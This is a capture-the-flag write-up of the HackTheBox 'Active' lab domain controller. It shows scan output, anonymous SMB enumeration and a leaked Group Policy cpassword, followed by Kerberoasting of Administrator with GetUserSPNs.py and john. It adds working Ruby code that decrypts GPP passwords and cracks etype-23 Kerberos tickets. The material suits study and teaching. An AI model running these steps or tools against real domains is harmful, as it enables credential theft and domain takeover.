Summary
There is anonymous access to the Replication SMB share, which mirrors the SYSVOL layout.
Since the server is Windows Server 2008 R2, the replicated group policy still contains a Groups.xml with a Group Policy Preferences cpassword for a user (the practice was only stopped by MS14-025, and files already in SYSVOL were not cleaned up).
It can be decrypted using gpp-decrypt, because the AES key is public.
Checking the admin account: Administrator has a ServicePrincipalName, so it can be Kerberoasted using the svc_tgs account and the ticket cracked offline.
Walkthrough
Enumeration
Let’s start with a port scan (rustscan finds the open ports and hands them to nmap).
argenestel@parrot ~/Desktop/hackthebox/active rustscan 10.10.10.100
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
Faster Nmap scanning with Rust.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan
[~] The config file is expected to be at "/home/argenestel/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitiv
e servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up
the Ulimit with '--ulimit 5000'.
Open 10.10.10.100:53
Open 10.10.10.100:88
Open 10.10.10.100:135
Open 10.10.10.100:139
Open 10.10.10.100:389
Open 10.10.10.100:445
Open 10.10.10.100:464
Open 10.10.10.100:593
Open 10.10.10.100:636
Open 10.10.10.100:3269
Open 10.10.10.100:3268
Open 10.10.10.100:5722
Open 10.10.10.100:9389
Open 10.10.10.100:49152
Open 10.10.10.100:49153
Open 10.10.10.100:49154
Open 10.10.10.100:49155
Open 10.10.10.100:49157
Open 10.10.10.100:49158
Open 10.10.10.100:49169
Open 10.10.10.100:49172
Open 10.10.10.100:49182
[~] Starting Nmap
[>] The Nmap command to be run is nmap -vvv -p 53,88,135,139,389,445,464,593,636,3269,3268,5722,9389,49152
,49153,49154,49155,49157,49158,49169,49172,49182 10.10.10.100
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-01 09:39 IST
Initiating Ping Scan at 09:39
Scanning 10.10.10.100 [2 ports]
Completed Ping Scan at 09:39, 0.26s elapsed (1 total hosts)
Initiating Connect Scan at 09:39
Scanning active.htb (10.10.10.100) [22 ports]
Discovered open port 139/tcp on 10.10.10.100
Discovered open port 53/tcp on 10.10.10.100
Discovered open port 3268/tcp on 10.10.10.100
Discovered open port 445/tcp on 10.10.10.100
Discovered open port 389/tcp on 10.10.10.100
Discovered open port 135/tcp on 10.10.10.100
Discovered open port 49158/tcp on 10.10.10.100
Discovered open port 49182/tcp on 10.10.10.100
Discovered open port 49157/tcp on 10.10.10.100
Discovered open port 3269/tcp on 10.10.10.100
Discovered open port 49152/tcp on 10.10.10.100
Discovered open port 49153/tcp on 10.10.10.100
Discovered open port 49169/tcp on 10.10.10.100
Discovered open port 49172/tcp on 10.10.10.100
Discovered open port 636/tcp on 10.10.10.100
Discovered open port 49154/tcp on 10.10.10.100
Discovered open port 9389/tcp on 10.10.10.100
Discovered open port 5722/tcp on 10.10.10.100
Discovered open port 49155/tcp on 10.10.10.100
Discovered open port 464/tcp on 10.10.10.100
Discovered open port 88/tcp on 10.10.10.100
Discovered open port 593/tcp on 10.10.10.100
Completed Connect Scan at 09:39, 0.49s elapsed (22 total ports)
Nmap scan report for active.htb (10.10.10.100)
Host is up, received conn-refused (0.25s latency).
Scanned at 2020-11-01 09:39:37 IST for 1s
PORT STATE SERVICE REASON
53/tcp open domain syn-ack
88/tcp open kerberos-sec syn-ack
135/tcp open msrpc syn-ack
139/tcp open netbios-ssn syn-ack
389/tcp open ldap syn-ack
445/tcp open microsoft-ds syn-ack
464/tcp open kpasswd5 syn-ack
593/tcp open http-rpc-epmap syn-ack
636/tcp open ldapssl syn-ack
3268/tcp open globalcatLDAP syn-ack
3269/tcp open globalcatLDAPssl syn-ack
5722/tcp open msdfsr syn-ack
9389/tcp open adws syn-ack
49152/tcp open unknown syn-ack
49153/tcp open unknown syn-ack
49154/tcp open unknown syn-ack
49155/tcp open unknown syn-ack
49157/tcp open unknown syn-ack
49158/tcp open unknown syn-ack
49169/tcp open unknown syn-ack
49172/tcp open unknown syn-ack
49182/tcp open unknown syn-ack
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.87 seconds
Running the default scripts and service detection (-sC -sV) against the open ports.
argenestel@parrot ~/Desktop/hackthebox/active/nmap cat active
# Nmap 7.80 scan initiated Sun Nov 1 09:52:53 2020 as: nmap -vvv -p 53,88,135,139,389,445,464,593,636,3269,3268,5722,9389,49152,49153,49154,49155,49157,49158,49169,49172,49182 -sC -sV -oN nmap/active 10.10.10.100
Nmap scan report for active.htb (10.10.10.100)
Host is up, received conn-refused (0.25s latency).
Scanned at 2020-11-01 09:52:53 IST for 199s
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2020-11-01 04:27:05Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack
5722/tcp open msrpc syn-ack Microsoft Windows RPC
9389/tcp open mc-nmf syn-ack .NET Message Framing
49152/tcp open msrpc syn-ack Microsoft Windows RPC
49153/tcp open msrpc syn-ack Microsoft Windows RPC
49154/tcp open msrpc syn-ack Microsoft Windows RPC
49155/tcp open msrpc syn-ack Microsoft Windows RPC
49157/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc syn-ack Microsoft Windows RPC
49169/tcp open msrpc syn-ack Microsoft Windows RPC
49172/tcp open msrpc syn-ack Microsoft Windows RPC
49182/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 4m01s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 24711/tcp): CLEAN (Couldn't connect)
| Check 2 (port 40109/tcp): CLEAN (Couldn't connect)
| Check 3 (port 29284/udp): CLEAN (Failed to receive data)
| Check 4 (port 38631/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-11-01T04:28:04
|_ start_date: 2020-11-01T04:11:17
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Nov 1 09:56:12 2020 -- 1 IP address (1 host up) scanned in 199.35 seconds
DNS port 53
From nmap, the domain is active.htb; add it to /etc/hosts. The query below asks the DC for an A record of the literal IP and gets FORMERR, so it tells us nothing; a zone transfer attempt (dig axfr active.htb @10.10.10.100) is the more useful check against a DC.
argenestel@parrot ~/Desktop/hackthebox/active dig 10.10.10.100 @10.10.10.100
; <<>> DiG 9.16.6-Debian <<>> 10.10.10.100 @10.10.10.100
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: FORMERR, id: 295
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1
;; WARNING: recursion requested but not available
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
; COOKIE: 4c963f3d36e16cb0 (echoed)
;; QUESTION SECTION:
;10.10.10.100. IN A
;; Query time: 275 msec
;; SERVER: 10.10.10.100#53(10.10.10.100)
;; WHEN: Sun Nov 01 10:42:24 IST 2020
;; MSG SIZE rcvd: 53
Nothing interesting. Moving to SMB.
SMB port 445
Running enum4linux returned nothing, so I have left that output out. Next, check which shares are accessible to an unauthenticated (null session) user with smbmap.
smbmap -H 10.10.10.100
[+] IP: 10.10.10.100:445 Name: active.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
Reading Replication is possible: anonymous has READ ONLY on it, and the directory layout below shows it is a replica of SYSVOL, so any Group Policy Preferences files in it can be read without credentials.
argenestel@parrot ~/Desktop/hackthebox/active/nmap smbclient \\\\10.10.10.100/Replication
Enter WORKGROUP\argenestel's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sat Jul 21 16:07:44 2018
.. D 0 Sat Jul 21 16:07:44 2018
active.htb D 0 Sat Jul 21 16:07:44 2018
ls -la
10459647 blocks of size 4096. 4925385 blocks available
smb: \> ls -la
NT_STATUS_NO_SUCH_FILE listing \-la
smb: \> cd active.htb
smb: \active.htb\> dir
. D 0 Sat Jul 21 16:07:44 2018
.. D 0 Sat Jul 21 16:07:44 2018
DfsrPrivate DHS 0 Sat Jul 21 16:07:44 2018
Policies D 0 Sat Jul 21 16:07:44 2018
scripts D 0 Thu Jul 19 00:18:57 2018
10459647 blocks of size 4096. 4925385 blocks available
smb: \active.htb\> recurse
smb: \active.htb\> ls
. D 0 Sat Jul 21 16:07:44 2018
.. D 0 Sat Jul 21 16:07:44 2018
DfsrPrivate DHS 0 Sat Jul 21 16:07:44 2018
Policies D 0 Sat Jul 21 16:07:44 2018
scripts D 0 Thu Jul 19 00:18:57 2018
\active.htb\DfsrPrivate
. DHS 0 Sat Jul 21 16:07:44 2018
.. DHS 0 Sat Jul 21 16:07:44 2018
ConflictAndDeleted D 0 Thu Jul 19 00:21:30 2018
Deleted D 0 Thu Jul 19 00:21:30 2018
Installing D 0 Thu Jul 19 00:21:30 2018
\active.htb\Policies
. D 0 Sat Jul 21 16:07:44 2018
.. D 0 Sat Jul 21 16:07:44 2018
{31B2F340-016D-11D2-945F-00C04FB984F9} D 0 Sat Jul 21 16:07:44 2018
{6AC1786C-016F-11D2-945F-00C04fB984F9} D 0 Sat Jul 21 16:07:44 2018
\active.htb\scripts
. D 0 Thu Jul 19 00:18:57 2018
.. D 0 Thu Jul 19 00:18:57 2018
\active.htb\DfsrPrivate\ConflictAndDeleted
. D 0 Thu Jul 19 00:21:30 2018
.. D 0 Thu Jul 19 00:21:30 2018
\active.htb\DfsrPrivate\Deleted
. D 0 Thu Jul 19 00:21:30 2018
.. D 0 Thu Jul 19 00:21:30 2018
\active.htb\DfsrPrivate\Installing
. D 0 Thu Jul 19 00:21:30 2018
.. D 0 Thu Jul 19 00:21:30 2018
\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}
. D 0 Sat Jul 21 16:07:44 2018
.. D 0 Sat Jul 21 16:07:44 2018
GPT.INI A 23 Thu Jul 19 02:16:06 2018
Group Policy D 0 Sat Jul 21 16:07:44 2018
MACHINE D 0 Sat Jul 21 16:07:44 2018
USER D 0 Thu Jul 19 00:19:12 2018
\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}
. D 0 Sat Jul 21 16:07:44 2018
.. D 0 Sat Jul 21 16:07:44 2018
GPT.INI A 22 Thu Jul 19 00:19:12 2018
MACHINE D 0 Sat Jul 21 16:07:44 2018
USER D 0 Thu Jul 19 00:19:12 2018
\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy
. D 0 Sat Jul 21 16:07:44 2018
.. D 0 Sat Jul 21 16:07:44 2018
GPE.INI A 119 Thu Jul 19 02:16:06 2018
\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE
. D 0 Sat Jul 21 16:07:44 2018
.. D 0 Sat Jul 21 16:07:44 2018
Microsoft D 0 Sat Jul 21 16:07:44 2018
Preferences D 0 Sat Jul 21 16:07:44 2018
Registry.pol A 2788 Thu Jul 19 00:23:45 2018
\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\USER
. D 0 Thu Jul 19 00:19:12 2018
.. D 0 Thu Jul 19 00:19:12 2018
\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE
. D 0 Sat Jul 21 16:07:44 2018
.. D 0 Sat Jul 21 16:07:44 2018
Microsoft D 0 Sat Jul 21 16:07:44 2018
\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\USER
. D 0 Thu Jul 19 00:19:12 2018
.. D 0 Thu Jul 19 00:19:12 2018
\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft
. D 0 Sat Jul 21 16:07:44 2018
.. D 0 Sat Jul 21 16:07:44 2018
Windows NT D 0 Sat Jul 21 16:07:44 2018
\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences
. D 0 Sat Jul 21 16:07:44 2018
.. D 0 Sat Jul 21 16:07:44 2018
Groups D 0 Sat Jul 21 16:07:44 2018
\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft
. D 0 Sat Jul 21 16:07:44 2018
.. D 0 Sat Jul 21 16:07:44 2018
Windows NT D 0 Sat Jul 21 16:07:44 2018
\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT
. D 0 Sat Jul 21 16:07:44 2018
.. D 0 Sat Jul 21 16:07:44 2018
SecEdit D 0 Sat Jul 21 16:07:44 2018
\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups
. D 0 Sat Jul 21 16:07:44 2018
.. D 0 Sat Jul 21 16:07:44 2018
Groups.xml A 533 Thu Jul 19 02:16:06 2018
\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT
. D 0 Sat Jul 21 16:07:44 2018
.. D 0 Sat Jul 21 16:07:44 2018
SecEdit D 0 Sat Jul 21 16:07:44 2018
\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit
. D 0 Sat Jul 21 16:07:44 2018
.. D 0 Sat Jul 21 16:07:44 2018
GptTmpl.inf A 1098 Thu Jul 19 00:19:12 2018
\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit
. D 0 Sat Jul 21 16:07:44 2018
.. D 0 Sat Jul 21 16:07:44 2018
GptTmpl.inf A 3722 Thu Jul 19 00:19:12 2018
10459647 blocks of size 4096. 4925385 blocks available
Groups.xml looks interesting: Group Policy Preferences stores local user and group changes there, and its cpassword attribute holds the account password.
argenestel@parrot ~/Desktop/hackthebox/active/nmap cat Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
SVC_TGS is the username. cpassword is a Group Policy Preferences password: it is AES-256-CBC encrypted with a static key that Microsoft published in its own documentation, so anyone who can read the file can decrypt it, for example with gpp-decrypt. MS14-025 stopped new passwords being written this way, but it did not remove existing Groups.xml files from SYSVOL.
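As an added example (not code from the original post, and not gpp-decrypt itself), the decryption in Ruby with the published key, plus a parser that walks a preferences XML file and returns every credential it carries. The sample XML is constructed to match the layout of the Groups.xml above, and its password is made up, not the one from the box; the attribute names for the other preference files (Drives.xml, Services.xml, ScheduledTasks.xml, DataSources.xml) are included so the same function works on all of them.

```ruby
require 'openssl'
require 'rexml/document'

# AES-256-CBC key Microsoft published in its GPP documentation (the weakness
# addressed by MS14-025). The IV is 16 zero bytes. Both are public constants.
GPP_AES_KEY = ['4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b'].pack('H*')
GPP_AES_IV  = ("\x00" * 16).b

# Decrypt one cpassword attribute value. The value is base64 with the '='
# padding usually stripped, and the plaintext is UTF-16LE.
def gpp_decrypt(cpassword)
  padded = cpassword + ('=' * ((4 - cpassword.length % 4) % 4))
  cipher = OpenSSL::Cipher.new('aes-256-cbc')
  cipher.decrypt
  cipher.key = GPP_AES_KEY
  cipher.iv  = GPP_AES_IV
  plain = cipher.update(padded.unpack1('m')) + cipher.final
  plain.force_encoding('UTF-16LE').encode('UTF-8')
end

# Inverse of gpp_decrypt; used here only to construct test data. Real values
# are written by the Group Policy editor, not by us.
def gpp_encrypt(password)
  cipher = OpenSSL::Cipher.new('aes-256-cbc')
  cipher.encrypt
  cipher.key = GPP_AES_KEY
  cipher.iv  = GPP_AES_IV
  ct = cipher.update(password.encode('UTF-16LE').b) + cipher.final
  [ct].pack('m0').delete('=')
end

# Pull every credential out of a GPP XML file. Groups.xml uses userName; the
# other files that carry cpassword use accountName, runAs or username.
def gpp_credentials(xml)
  doc = REXML::Document.new(xml)
  REXML::XPath.match(doc, '//Properties[@cpassword]').map do |props|
    attrs = props.attributes
    user = %w[userName accountName runAs username].map { |k| attrs[k] }.compact.first
    { user: user, password: gpp_decrypt(attrs['cpassword']) }
  end
end

# Constructed sample in the layout of the Groups.xml found on the Replication
# share; the password is made up and is not the one from the box.
SAMPLE_GROUPS_XML = <<~XML
  <?xml version="1.0" encoding="utf-8"?>
  <Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
    <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\\SVC_TGS" image="2">
      <Properties action="U" cpassword="#{gpp_encrypt('Example-GPP-Pass-1')}"
                  changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"
                  userName="active.htb\\SVC_TGS"/>
    </User>
  </Groups>
XML

if __FILE__ == $PROGRAM_NAME
  gpp_credentials(SAMPLE_GROUPS_XML).each { |c| puts "#{c[:user]} : #{c[:password]}" }
end
```

Point gpp_credentials at the real Groups.xml pulled from the share and it prints the same result gpp-decrypt gives; the decrypt side never needs a password of its own, which is the whole problem with cpassword.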
Exploitation
User SVC_TGS
argenestel@parrot ~/Desktop/hackthebox/active/nmap gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
/usr/bin/gpp-decrypt:21: warning: constant OpenSSL::Cipher::Cipher is deprecated
<redacted>
Here we go. With SVC_TGS’s password, the next step is to check what that account can reach.
argenestel@parrot ~/Desktop/hackthebox/active/nmap smbmap -u SVC_TGS -p
The Users share is now readable and contains user.txt.
Moving on to Administrator.
Can I Kerberoast Administrator? Any authenticated domain user can ask the KDC for a service ticket for any account that has a ServicePrincipalName, and that ticket is encrypted with the target account’s own key, so if Administrator has an SPN its ticket can be cracked offline. Trying out a few random things led me to this conclusion.
- Biggest spoiler: the Kerberoasting section of PayloadsAllTheThings.
Administrator
argenestel@parrot ~/Desktop/hackthebox/active/nmap GetUserSPNs.py active.htb/SVC_TGS:<redacted> -dc-ip 10.10.10.100 -request
/home/argenestel/.local/lib/python2.7/site-packages/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer suppo
rted by the Python core team. Support for it is now deprecated in cryptography, and will be removed in a future release.
from cryptography import x509
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon
Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- ----------
---------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-19 00:36:40.351723 2018-07-30
22:47:40.656520
$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$0c46bb20097739b1bfe26fee14b7a298$594d843b64492268a7cc09da5a7679234dcb9cd4eb63c
01b5f91bade59f0f73f79717fa02ece84219b8fdd4bb4ed06c0a8dec3209bab143f2039fcc9c4b6b7027355d64855bafd19815682ae041faa5f222ba90c3de9341efc
898d153e3bcfa060499f4928304d26227a27c64edb8a3e9acc86d5332cc4d96245138c7f7120a82de23bd320e5fa158f41b1988371851b9d141ef37f06b10c1684c5e
84c02e0cbe5bb39560ae386c5429b0bc3a2fbb54c5ab71b986f8a8ddae91be1fd230b158d7b5293604adc70d9660843c
....<continue>
Alright, we get a krb5tgs hash. The ticket is encrypted with the Administrator account’s key (etype 23 is RC4-HMAC, keyed by the NT hash of the password), so it can be cracked offline against a wordlist. Let’s check if john can crack it and give us Administrator.
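To make concrete why a ticket obtained this way is an offline-crackable hash, here is an added example (not code from the original post, and not john’s or Impacket’s code) that implements the etype 23 check end to end in Ruby: NT hash via MD4, the RFC 4757 RC4-HMAC key derivation, and the candidate test john performs for each wordlist entry. The hash on the page is truncated, so the block builds its own $krb5tgs$23$ line with the principal names from the page but a made-up password, confounder and ticket body (a real one is an ASN.1 EncTicketPart); MD4 is written out because OpenSSL 3 keeps it in the legacy provider.

```ruby
require 'openssl'

MASK32 = 0xffffffff

# MD4 (RFC 1320) in pure Ruby; NTLM is MD4(UTF-16LE(password)).
def md4(msg)
  rotl = ->(x, n) { ((x << n) | (x >> (32 - n))) & MASK32 }
  rounds = [
    [->(x, y, z) { (x & y) | (~x & z) }, 0, (0..15).to_a, [3, 7, 11, 19]],
    [->(x, y, z) { (x & y) | (x & z) | (y & z) }, 0x5a827999,
     [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], [3, 5, 9, 13]],
    [->(x, y, z) { x ^ y ^ z }, 0x6ed9eba1,
     [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], [3, 9, 11, 15]]
  ]
  a, b, c, d = 0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476
  bits = msg.bytesize * 8
  data = msg.b + "\x80".b
  data << "\x00".b until data.bytesize % 64 == 56
  data << [bits & MASK32, bits >> 32].pack('V2')   # 64-bit little-endian bit length
  data.unpack('V*').each_slice(16) do |x|
    aa, bb, cc, dd = a, b, c, d
    rounds.each do |fn, add, order, shifts|
      order.each_with_index do |k, i|
        a = rotl.((a + fn.(b, c, d) + x[k] + add) & MASK32, shifts[i % 4])
        a, b, c, d = d, a, b, c
      end
    end
    a, b, c, d = (a + aa) & MASK32, (b + bb) & MASK32, (c + cc) & MASK32, (d + dd) & MASK32
  end
  [a, b, c, d].pack('V4')
end

def ntlm_hash(password)
  md4(password.encode('UTF-16LE').b)
end

# Plain RC4 keystream XOR, the cipher behind etype 23.
def rc4(key, data)
  s = (0..255).to_a
  kb = key.bytes
  j = 0
  256.times do |i|
    j = (j + s[i] + kb[i % kb.size]) & 0xff
    s[i], s[j] = s[j], s[i]
  end
  i = j = 0
  data.bytes.map do |byte|
    i = (i + 1) & 0xff
    j = (j + s[i]) & 0xff
    s[i], s[j] = s[j], s[i]
    byte ^ s[(s[i] + s[j]) & 0xff]
  end.pack('C*')
end

# RFC 4757 RC4-HMAC: K1 = HMAC-MD5(K, usage); checksum = HMAC-MD5(K1, data);
# K3 = HMAC-MD5(K1, checksum); edata = RC4(K3, data). Key usage 2 is the
# ticket's encrypted part, which is what the TGS-REP hands the requester.
USAGE_TICKET = [2].pack('V')

def hmac_md5(key, data)
  OpenSSL::HMAC.digest('MD5', key, data)
end

def rc4_hmac_seal(key, usage, plaintext)
  k1 = hmac_md5(key, usage)
  checksum = hmac_md5(k1, plaintext)
  [checksum, rc4(hmac_md5(k1, checksum), plaintext)]
end

# Emit the $krb5tgs$23$ line format GetUserSPNs.py writes and john/hashcat read.
def krb5tgs_line(user, realm, spn, password, confounder, ticket_body)
  checksum, edata = rc4_hmac_seal(ntlm_hash(password), USAGE_TICKET, confounder + ticket_body)
  "$krb5tgs$23$*#{user}$#{realm}$#{spn}*$#{checksum.unpack1('H*')}$#{edata.unpack1('H*')}"
end

def parse_krb5tgs(line)
  m = line.match(/\A\$krb5tgs\$23\$\*([^$]+)\$([^$]+)\$([^*]+)\*\$(\h{32})\$(\h+)\z/)
  raise ArgumentError, 'not an etype-23 krb5tgs hash' unless m
  { user: m[1], realm: m[2], spn: m[3], checksum: [m[4]].pack('H*'), edata: [m[5]].pack('H*') }
end

# One candidate: derive K1 and K3 from the guess, decrypt, and see whether the
# HMAC over the recovered plaintext equals the checksum the DC sent.
def guess_matches?(h, password)
  k1 = hmac_md5(ntlm_hash(password), USAGE_TICKET)
  plain = rc4(hmac_md5(k1, h[:checksum]), h[:edata])
  hmac_md5(k1, plain) == h[:checksum]
end

def crack_krb5tgs(line, candidates)
  h = parse_krb5tgs(line)
  candidates.find { |pw| guess_matches?(h, pw) }
end

# Constructed ticket: principal names from the box, everything else made up.
SAMPLE_HASH = krb5tgs_line('Administrator', 'ACTIVE.HTB', 'active/CIFS~445', 'Summer2018!',
                           "\x01\x02\x03\x04\x05\x06\x07\x08".b, 'constructed EncTicketPart bytes'.b)

puts crack_krb5tgs(SAMPLE_HASH, %w[Password1 Welcome1 Summer2018!]).inspect if __FILE__ == $PROGRAM_NAME
```

The primitives here are exactly what john names when it loads the hash ("Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4]"): one MD4 and three HMAC-MD5 per guess, no salt beyond the ticket itself, which is why RC4 service tickets for accounts with weak passwords fall to a wordlist in seconds and why AES-only SPN accounts with long passwords are the defence.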
✘ argenestel@parrot ~/Desktop/hackthebox/active/nmap john --wordlist=/usr/share/wordlists/rockyou.txt admin.spn
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
<redacted> (?)
1g 0:00:00:12 DONE (2020-11-01 14:32) 0.07936g/s 836347p/s 836347c/s 836347C/s Tiffani1432..Thrash1
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Done.
With the Administrator password we can read root.txt by logging in with psexec.py or over SMB. As a check, smbmap with the Administrator credentials now shows READ, WRITE on ADMIN$ and C$. Note that smbmap tests write access by creating a directory on each share and here could not remove the one it made in SYSVOL; clean it up manually.
[+] IP: 10.10.10.100:445 Name: active.htb
[/] Work[!] Unable to remove test directory at \\10.10.10.100\SYSVOL\NERGHTUYIV, please remove manually
Disk Permissions Comment
---- ----------- -------
ADMIN$ READ, WRITE Remote Admin
C$ READ, WRITE Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ, WRITE Logon server share
Replication READ ONLY
SYSVOL READ, WRITE Logon server share
Users READ ONLY